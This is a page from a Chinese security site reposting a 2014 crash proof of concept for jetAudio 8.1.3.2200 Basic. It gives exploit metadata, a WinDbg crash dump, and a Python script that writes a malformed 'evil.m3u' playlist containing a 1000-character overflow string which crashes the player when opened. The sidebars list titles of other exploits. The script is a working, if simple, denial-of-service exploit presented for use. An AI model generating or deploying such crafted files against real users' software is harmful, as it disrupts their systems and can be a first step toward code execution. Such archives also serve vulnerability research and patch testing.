首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
jetAudio 8.1.3.2200 Crash Proof Of Concept
来源:s-dz@hotmail.fr 作者:samir 发布时间:2014-12-30  
# Exploit Title         : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product               : jetAudio Basic
# Date                  : 27.12.2014
# Exploit Author        : Hadji Samir s-dz@hotmail.fr
# Software Link         : http://www.jetaudio.com/download/
# Vulnerable version    : 8.1.3.2200 Basic
# Vendor Homepage       : http://www.jetaudio.com/
# Tested on             : Windows 7 x86 fr
#============================================================================================
#   Open created POC file (evil.m3u) with jetAudio
#   Details
#   ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
#   eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
#   eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0         nv up ei pl zr na pe nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#   *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
#   ntdll!LdrVerifyImageMatchesChecksum+0x633:
#   76f2e60e cc              int     3
#
#   0:000> kb
#   ChildEBP RetAddr  Args to Child              
#   WARNING: Stack unwind information not available. Following frames may be wrong.
#   0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
#   0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
#   0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
#   0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#!/usr/bin/python

from struct import pack
m3u = ("http://%s")
buf = "\x41" * 1000
m3u %= buf
fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WhatsApp <= 2.11.476 - Remote
·Maxthon Browser Address Bar Sp
·WordPress Themes download.php
·Desktop Linux Password Stealer
·AMSI 3.20.47 Build 37 File Dis
·ProjectSend Arbitrary File Upl
·Phase botnet blind SQL injecti
·Liferay Portal 7.0.x <= 7.0.2
·GParted 0.14.1 - OS Command Ex
·PHPads <= 213607 - Authenticat
·jetAudio 8.1.3 Basic (mp3) - C
·i-FTP Schedule Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved